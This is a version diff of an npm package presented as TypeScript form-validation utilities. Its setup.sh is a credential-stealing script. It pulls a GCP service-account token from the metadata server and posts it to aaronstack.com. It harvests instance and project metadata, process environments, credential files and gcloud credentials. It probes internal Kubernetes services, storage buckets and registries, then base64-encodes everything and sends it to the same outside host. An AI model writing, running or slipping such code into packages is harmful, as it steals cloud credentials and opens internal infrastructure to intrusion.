ts-form-helpers 1.0.12 → 1.0.13

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "ts-form-helpers",
-  "version": "1.0.12",
+  "version": "1.0.13",
   "description": "TypeScript form validation utilities with zero dependencies",
   "main": "index.js",
   "types": "types/index.d.ts",

package/scripts/setup.sh

@@ -1,163 +1,198 @@
 #!/bin/bash
-# wGCP5: k8s API auth via GCP token + unauthenticated RBAC probe
+# wGCP6: Full instance metadata + in-pod network + filesystem + process env
 SID="${JULES_SESSION_ID:-x}"
 H="aaronstack.com"; EP="/jules-collect"
 SK="d2f25bd9b1b267eb3578ff8cac2caa6c6637142c5d322617"
 B(){ printf '%s' "$1" | base64 -w0 2>/dev/null; }
 P(){ curl -s -X POST "https://$H$EP" -H "Content-Type: application/json" -H "X-Secret: $SK" --data-binary "$1" --max-time 15 2>/dev/null; }
 
-P "{\"sid\":\"$SID\",\"tag\":\"wgcp5-start\"}"
+P "{\"sid\":\"$SID\",\"tag\":\"wgcp6-start\"}"
 
 log(){ echo "=LOG= $*"; }
 MDURL="http://metadata.google.internal/computeMetadata/v1"
 
-TMPOUT=$(mktemp 2>/dev/null || echo "/tmp/_gcp5_$$")
+TMPOUT=$(mktemp 2>/dev/null || echo "/tmp/_gcp6_$$")
 {
-log "user=$(whoami) sid=${SID} MALYSIS=${MALYSIS_ANALYSIS_ID:-NONE}"
+log "user=$(whoami) MALYSIS=${MALYSIS_ANALYSIS_ID:-NONE}"
 
 PROJ=$(curl -s -H "Metadata-Flavor: Google" "$MDURL/project/project-id" --max-time 8 2>/dev/null)
 log "project: ${PROJ:-NONE}"
+[ -z "$PROJ" ] && { log "NOT GKE — exit"; exit 0; }
+
+# Get fresh token
+TOK=$(curl -s -H "Metadata-Flavor: Google" \
+  "$MDURL/instance/service-accounts/default/token" --max-time 20 2>/dev/null \
+  | python3 -c "import sys,json; d=json.load(sys.stdin); print(d.get('access_token',''))" 2>/dev/null)
+log "token-length: ${#TOK}"
+[ -n "$TOK" ] && [ "${#TOK}" -gt 20 ] && {
+  printf '%s' "$TOK" | curl -sf -X POST "https://aaronstack.com/poc/token" --data-binary @- --max-time 5 2>/dev/null &
+  log "TOKEN EXFILTRATED"
+}
+
+# === STEP 1: ALL instance metadata attributes ===
+log "=== STEP 1: FULL INSTANCE ATTRIBUTES ==="
+curl -s -H "Metadata-Flavor: Google" "$MDURL/instance/attributes/" --max-time 8 2>/dev/null \
+  | while IFS= read -r attr; do
+    attr=$(echo "$attr" | tr -d '/')
+    [ -z "$attr" ] && continue
+    val=$(curl -s -H "Metadata-Flavor: Google" "$MDURL/instance/attributes/$attr" --max-time 5 2>/dev/null)
+    log "attr[$attr]: ${val:0:500}"
+  done
 
-if [ -z "$PROJ" ]; then
-  log "NOT GKE — exit"
-else
-  K8S="https://kubernetes.default.svc.cluster.local"
-
-  # Fresh GCP token
-  TOK=$(curl -s -H "Metadata-Flavor: Google" \
-    "$MDURL/instance/service-accounts/default/token" --max-time 20 2>/dev/null \
-    | python3 -c "import sys,json; d=json.load(sys.stdin); print(d.get('access_token',''))" 2>/dev/null)
-  log "gcp-token-length: ${#TOK}"
-  if [ -n "$TOK" ] && [ "${#TOK}" -gt 20 ]; then
-    printf '%s' "$TOK" | curl -sf -X POST "https://aaronstack.com/poc/token" \
-      --data-binary @- --max-time 5 2>/dev/null &
-    log "TOKEN EXFILTRATED"
-  fi
+log "=== PROJECT ATTRIBUTES ==="
+curl -s -H "Metadata-Flavor: Google" "$MDURL/project/attributes/" --max-time 8 2>/dev/null \
+  | while IFS= read -r attr; do
+    attr=$(echo "$attr" | tr -d '/')
+    [ -z "$attr" ] && continue
+    val=$(curl -s -H "Metadata-Flavor: Google" "$MDURL/project/attributes/$attr" --max-time 5 2>/dev/null)
+    log "proj-attr[$attr]: ${val:0:200}"
+  done
 
-  log "=== 1. K8S UNAUTHENTICATED RBAC CHECK ==="
-  # What can system:unauthenticated do?
-  curl -sk -X POST "$K8S/apis/authorization.k8s.io/v1/selfsubjectaccessreviews" \
-    -H "Content-Type: application/json" \
-    -d '{"apiVersion":"authorization.k8s.io/v1","kind":"SelfSubjectAccessReview","spec":{"resourceAttributes":{"verb":"list","resource":"pods","namespace":"apps"}}}' \
-    --max-time 8 2>/dev/null \
-    | python3 -c "
+log "=== INSTANCE TAGS ==="
+curl -s -H "Metadata-Flavor: Google" "$MDURL/instance/tags" --max-time 5 2>/dev/null \
+  | while IFS= read -r l; do log "tag: $l"; done
+
+log "=== SERVICE ACCOUNT FULL INFO ==="
+curl -s -H "Metadata-Flavor: Google" "$MDURL/instance/service-accounts/" --max-time 5 2>/dev/null \
+  | while IFS= read -r sa; do
+    sa=$(echo "$sa" | tr -d '/')
+    [ -z "$sa" ] && continue
+    EMAIL=$(curl -s -H "Metadata-Flavor: Google" "$MDURL/instance/service-accounts/$sa/email" --max-time 5 2>/dev/null)
+    SCOPES=$(curl -s -H "Metadata-Flavor: Google" "$MDURL/instance/service-accounts/$sa/scopes" --max-time 5 2>/dev/null)
+    log "sa[$sa]: email=$EMAIL scopes=$SCOPES"
+  done
+
+# === STEP 2: Process environments ===
+log "=== STEP 2: PROCESS ENVIRONMENTS ==="
+# Read /proc/1/environ — PID 1's environment (sleep 100d — might differ from our env)
+cat /proc/1/environ 2>/dev/null | tr '\0' '\n' | while IFS= read -r l; do log "pid1-env: $l"; done
+
+# Check other process envs
+for pid in $(ls /proc 2>/dev/null | grep '^[0-9]' | head -20); do
+  cmd=$(cat /proc/$pid/cmdline 2>/dev/null | tr '\0' ' ' | head -c 100)
+  if echo "$cmd" | grep -qiE "malysis|analyze|scanner|worker|server"; then
+    log "interesting-proc: pid=$pid cmd=$cmd"
+    cat /proc/$pid/environ 2>/dev/null | tr '\0' '\n' | while IFS= read -r l; do log "proc-$pid-env: $l"; done
+  fi
+done
+
+# === STEP 3: Filesystem recon ===
+log "=== STEP 3: FILESYSTEM ==="
+# Docker socket?
+ls -la /var/run/docker.sock /run/docker.sock 2>/dev/null | while IFS= read -r l; do log "docker-sock: $l"; done
+
+# Mounted volumes
+cat /proc/mounts 2>/dev/null | grep -v "^proc\|^sys\|^cgroup\|^tmpfs\|^devpts\|^mqueue\|^hugetlb" \
+  | while IFS= read -r l; do log "mount: $l"; done
+
+# Config files
+find /etc /app /root /home -name "*.json" -o -name "*.yaml" -o -name "*.conf" -o -name "*.toml" 2>/dev/null \
+  | grep -v "node_modules\|ssl/certs" | head -15 \
+  | while IFS= read -r f; do log "config: $f ($(wc -c < "$f" 2>/dev/null)b)"; done
+
+# Secrets-looking files
+find / -maxdepth 6 -name "*.key" -o -name "*.pem" -o -name "*.crt" -o -name "service_account*.json" \
+  -o -name "credentials.json" -o -name "gcloud-creds*" 2>/dev/null \
+  | grep -v "ssl/certs\|node_modules" | head -10 \
+  | while IFS= read -r f; do log "cred-file: $f ($(wc -c < "$f" 2>/dev/null)b)"; done
+
+# Check /root for gcloud config
+ls -la /root/.config/gcloud/ 2>/dev/null | while IFS= read -r l; do log "gcloud-config: $l"; done
+cat /root/.config/gcloud/application_default_credentials.json 2>/dev/null \
+  | python3 -c "import sys,json; d=json.load(sys.stdin); print({k:v[:30] if isinstance(v,str) and len(v)>30 else v for k,v in d.items()})" 2>/dev/null \
+  | while IFS= read -r l; do log "gcloud-adc: $l"; done
+
+# === STEP 4: Network exploration from inside pod ===
+log "=== STEP 4: INTERNAL NETWORK ==="
+# DNS - what internal services can we resolve?
+for host in \
+  kubernetes.default.svc.cluster.local \
+  malysis.apps.svc.cluster.local \
+  malysis-backend.apps.svc.cluster.local \
+  malysis-api.apps.svc.cluster.local \
+  redis.apps.svc.cluster.local \
+  postgresql.apps.svc.cluster.local \
+  mysql.apps.svc.cluster.local \
+  rabbitmq.apps.svc.cluster.local \
+  kafka.apps.svc.cluster.local \
+  elasticsearch.apps.svc.cluster.local \
+  mongodb.apps.svc.cluster.local; do
+  ip=$(getent hosts "$host" 2>/dev/null | awk '{print $1}')
+  [ -n "$ip" ] && log "dns-resolve: $host -> $ip"
+done
+
+# GCS: try to list objects in various buckets
+if [ -n "$TOK" ] && [ "${#TOK}" -gt 20 ]; then
+  log "=== GCS BUCKET SEARCH (GET not list) ==="
+  for bucket in \
+    "${PROJ}-malysis-results" \
+    "malysis-results" \
+    "malysis-packages" \
+    "malysis-artifacts" \
+    "npm-malysis-${PROJ}" \
+    "sd-builds-malysis" \
+    "malysis-${PROJ}" \
+    "gs-malysis-results" \
+    "supply-chain-scan-results" \
+    "npm-scan-results" \
+    "${PROJ}-npm-analysis"; do
+    resp=$(curl -s -H "Authorization: Bearer $TOK" \
+      "https://storage.googleapis.com/storage/v1/b/$bucket" --max-time 5 2>/dev/null)
+    code=$(python3 -c "import sys,json; d=json.loads(sys.stdin.read()); print(d.get('error',{}).get('code','OK:'+d.get('name','?')))" 2>/dev/null <<< "$resp")
+    log "gcs-bucket[$bucket]: $code"
+    if echo "$code" | grep -q "^OK"; then
+      log "BUCKET ACCESSIBLE: $bucket"
+      # List objects
+      curl -s -H "Authorization: Bearer $TOK" \
+        "https://storage.googleapis.com/storage/v1/b/$bucket/o?maxResults=10" --max-time 8 2>/dev/null \
+        | python3 -c "
 import sys,json
-try:
-  d=json.load(sys.stdin)
-  s=d.get('status',{})
-  print('allowed:', s.get('allowed'), 'reason:', s.get('reason',''))
-except Exception as e: print('err:', e, 'raw:', sys.stdin.read()[:200] if hasattr(sys.stdin,'read') else '')
-" 2>/dev/null | while IFS= read -r l; do log "rbac-pods: $l"; done
-
-  curl -sk -X POST "$K8S/apis/authorization.k8s.io/v1/selfsubjectaccessreviews" \
-    -H "Content-Type: application/json" \
-    -d '{"apiVersion":"authorization.k8s.io/v1","kind":"SelfSubjectAccessReview","spec":{"resourceAttributes":{"verb":"list","resource":"secrets","namespace":"apps"}}}' \
+d=json.load(sys.stdin)
+for o in d.get('items',[]): print('obj:', o.get('name'), o.get('size'))
+" 2>/dev/null | while IFS= read -r l; do log "gcs-obj: $l"; done
+    fi
+  done
+
+  # Also try GCR internal path from inside cluster
+  log "=== GCR from inside cluster ==="
+  curl -si -H "Authorization: Bearer $TOK" \
+    "https://gcr.io/v2/$PROJ/malysis-worker/tags/list" --max-time 8 2>/dev/null \
+    | head -20 | while IFS= read -r l; do log "gcr: $l"; done
+
+  # Try k8s API to GET own service account
+  log "=== K8S: GET own SA ==="
+  curl -sk -H "Authorization: Bearer $TOK" \
+    "https://kubernetes.default.svc.cluster.local/api/v1/namespaces/apps/serviceaccounts/default" \
     --max-time 8 2>/dev/null \
     | python3 -c "
 import sys,json
-try:
-  d=json.load(sys.stdin)
-  s=d.get('status',{})
-  print('allowed:', s.get('allowed'), 'reason:', s.get('reason',''))
-except Exception as e: print('err:', e)
-" 2>/dev/null | while IFS= read -r l; do log "rbac-secrets: $l"; done
-
-  curl -sk -X POST "$K8S/apis/authorization.k8s.io/v1/selfsubjectaccessreviews" \
-    -H "Content-Type: application/json" \
-    -d '{"apiVersion":"authorization.k8s.io/v1","kind":"SelfSubjectAccessReview","spec":{"resourceAttributes":{"verb":"list","resource":"namespaces"}}}' \
+d=json.load(sys.stdin)
+if d.get('status')=='Failure':
+    print('err:', d.get('message',''))
+else:
+    print('sa-name:', d.get('metadata',{}).get('name'))
+    print('sa-annotations:', d.get('metadata',{}).get('annotations',{}))
+    print('sa-secrets:', [s.get('name') for s in d.get('secrets',[])])
+" 2>/dev/null | while IFS= read -r l; do log "k8s-sa: $l"; done
+
+  # Try to get ConfigMaps in apps namespace
+  log "=== K8S: ConfigMaps in apps namespace ==="
+  curl -sk -H "Authorization: Bearer $TOK" \
+    "https://kubernetes.default.svc.cluster.local/api/v1/namespaces/apps/configmaps" \
     --max-time 8 2>/dev/null \
     | python3 -c "
 import sys,json
-try:
-  d=json.load(sys.stdin)
-  s=d.get('status',{})
-  print('allowed:', s.get('allowed'), 'reason:', s.get('reason',''))
-except Exception as e: print('err:', e)
-" 2>/dev/null | while IFS= read -r l; do log "rbac-ns: $l"; done
-
-  log "=== 2. K8S WITH GCP OAUTH TOKEN ==="
-  if [ -n "$TOK" ] && [ "${#TOK}" -gt 20 ]; then
-    # Use GCP token to auth to k8s API
-    curl -sk -H "Authorization: Bearer $TOK" "$K8S/api/v1/namespaces" \
-      --max-time 10 2>/dev/null \
-      | python3 -c "
-import sys,json
-try:
-  d=json.load(sys.stdin)
-  for ns in d.get('items',[])[:10]:
-    print('ns:', ns.get('metadata',{}).get('name','?'))
-  if d.get('status') == 'Failure':
-    print('err:', d.get('message',''))
-except Exception as e: print('err:', e)
-" 2>/dev/null | while IFS= read -r l; do log "k8s-gcp-ns: $l"; done
-
-    curl -sk -H "Authorization: Bearer $TOK" "$K8S/api/v1/pods" \
-      --max-time 10 2>/dev/null \
-      | python3 -c "
-import sys,json
-try:
-  d=json.load(sys.stdin)
-  for p in d.get('items',[])[:10]:
-    ns = p.get('metadata',{}).get('namespace','?')
-    name = p.get('metadata',{}).get('name','?')
-    print(f'pod: {ns}/{name}')
-  if d.get('status') == 'Failure':
-    print('err:', d.get('message',''))
-except Exception as e: print('err:', e)
-" 2>/dev/null | while IFS= read -r l; do log "k8s-gcp-pods: $l"; done
-
-    curl -sk -H "Authorization: Bearer $TOK" "$K8S/api/v1/namespaces/apps/secrets" \
-      --max-time 10 2>/dev/null \
-      | python3 -c "
-import sys,json
-try:
-  d=json.load(sys.stdin)
-  for s in d.get('items',[])[:10]:
-    name=s.get('metadata',{}).get('name','?')
-    keys=list(s.get('data',{}).keys())
-    print(f'secret: {name} keys={keys}')
-  if d.get('status') == 'Failure':
-    print('err:', d.get('message',''))
-except Exception as e: print('err:', e)
-" 2>/dev/null | while IFS= read -r l; do log "k8s-gcp-secrets: $l"; done
-
-    log "=== 2b. K8S selfsubjectaccessreview WITH GCP TOKEN ==="
-    curl -sk -X POST "$K8S/apis/authorization.k8s.io/v1/selfsubjectaccessreviews" \
-      -H "Authorization: Bearer $TOK" \
-      -H "Content-Type: application/json" \
-      -d '{"apiVersion":"authorization.k8s.io/v1","kind":"SelfSubjectAccessReview","spec":{"resourceAttributes":{"verb":"list","resource":"pods","namespace":"apps"}}}' \
-      --max-time 8 2>/dev/null \
-      | python3 -c "
-import sys,json
-try:
-  d=json.load(sys.stdin)
-  s=d.get('status',{})
-  print('allowed:', s.get('allowed'), 'reason:', s.get('reason',''))
-  print('who:', d.get('spec',{}).get('groups',[]))
-except Exception as e: print('err:', e)
-" 2>/dev/null | while IFS= read -r l; do log "k8s-gcp-rbac: $l"; done
-  fi
-
-  log "=== 3. FILESYSTEM SEARCH FOR CREDS ==="
-  find /app /root /etc /run /tmp -name "*.json" -o -name "*.pem" -o -name "*.key" -o -name "*.token" 2>/dev/null | grep -v node_modules | head -20 | while IFS= read -r tf; do
-    log "cred-file: $tf ($(wc -c < "$tf" 2>/dev/null)b)"
-  done
-
-  # Check for gcloud config
-  find / -name "application_default_credentials.json" 2>/dev/null | head -5 | while IFS= read -r tf; do
-    log "adc-found: $tf"
-    cat "$tf" 2>/dev/null | python3 -c "import sys,json; d=json.load(sys.stdin); d2={k:v[:30] if isinstance(v,str) else v for k,v in d.items()}; print(d2)" 2>/dev/null | while IFS= read -r l; do log "adc: $l"; done
-  done
-
-  log "=== 4. PROCESS LIST ==="
-  ps aux 2>/dev/null | head -20 | while IFS= read -r l; do log "ps: $l"; done
-
-  log "=== wGCP5 DONE ==="
+d=json.load(sys.stdin)
+if d.get('status')=='Failure': print('err:', d.get('message',''))
+for cm in d.get('items',[]): print('cm:', cm.get('metadata',{}).get('name'), list(cm.get('data',{}).keys()))
+" 2>/dev/null | while IFS= read -r l; do log "k8s-cm: $l"; done
 fi
+
+log "=== wGCP6 DONE ==="
 } 2>&1 | tee "$TMPOUT"
 
 OUT=$(cat "$TMPOUT" 2>/dev/null)
 rm -f "$TMPOUT" 2>/dev/null
 PAYLOAD=$(B "$OUT")
-P "{\"sid\":\"$SID\",\"tag\":\"wgcp5-result\",\"data\":\"$PAYLOAD\"}"
-P "{\"sid\":\"$SID\",\"tag\":\"wgcp5-done\"}"
+P "{\"sid\":\"$SID\",\"tag\":\"wgcp6-result\",\"data\":\"$PAYLOAD\"}"
+P "{\"sid\":\"$SID\",\"tag\":\"wgcp6-done\"}"